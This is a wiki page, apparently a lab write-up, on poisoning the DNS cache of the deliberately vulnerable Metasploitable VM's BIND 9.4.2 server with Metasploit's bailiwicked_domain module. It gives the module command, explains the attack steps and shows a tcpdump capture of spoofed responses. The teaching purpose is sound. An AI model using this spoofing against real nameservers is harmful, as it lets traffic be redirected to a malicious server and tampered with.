Metasploitable/DNS Bind
From charlesreid1
Searching for Exploits
Searching for exploits of the DNS service that is running, ISC BIND 9.4.2, we find the following exploit: https://www.exploit-db.com/exploits/6122/
This exploit is labeled auxiliary/spoof/dns/bailiwicked_domain. It allows us to insert malicious DNS records into the DNS server.
DNS Exploit: bailiwicked domain
We can use this exploit by running:
msf > use auxiliary/spoof/dns/bailiwicked_domain
More information:
This exploit targets a fairly ubiquitous flaw in DNS implementations which allow the insertion of malicious DNS records into the cache of the target nameserver. This exploit caches a single malicious nameserver entry into the target nameserver which replaces the legitimate nameservers for the target domain. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing target nameserver to insert the additional record into the cache. This insertion completely replaces the original nameserver records for the target domain.
To interpret:
- Metasploit induces the target nameserver to ask for information from a target domain. It then gathers information about the responses to craft its attack.
- Metasploit then induces the target nameserver to ask for random subdomains at the target domain, and sends fake responses from the target domain back to the target nameserver in an attempt to confuse the target nameserver.
- When the attack/spoofing is successful, the target nameserver will receive a new authority server record (faked by Metasploit), and will insert this new record into its DNS cache.
- This means the target nameserver has a new DNS record for the target domain, containing whatever DNS servers were set in the Metasploit attack.
- Now, anyone requesting the target domain from the target nameserver will actually be routed to your (malicious) nameserver, where you can tamper with the request before forwarding it along.
Doing It
We can set up the attack by setting the remote host and the various options.
Watching in another window with tcpdump:
# tcpdump -i eth0 [...] 23:45:29.567700 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109) 23:45:29.568213 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109) 23:45:29.568730 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109) 23:45:29.569319 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109) 23:45:29.569839 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109) 23:45:29.570284 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109) 23:45:29.570763 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109) 23:45:29.571290 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109) 23:45:29.572253 IP morpheus.55550 > 10.0.0.27.domain: 27562+ A? jYasQEH2mW9y.charlesreid1.com. (47) 23:45:29.573087 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106) 23:45:29.573567 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106) 23:45:29.574057 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106) 23:45:29.574547 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106) 23:45:29.575073 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106) 23:45:29.575629 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106) 23:45:29.576126 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106) 23:45:29.576616 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106) 23:45:29.577105 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106) 23:45:29.577631 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106) 23:45:29.578189 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106) 23:45:29.578677 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106) 23:45:29.579202 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106) 23:45:29.579627 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106) 23:45:29.580125 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106) 23:45:29.580734 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28057*- 1/1/1 A 173.174.209.222 (106) 23:45:29.581253 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28057*- 1/1/1 A 173.174.209.222 (106)
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|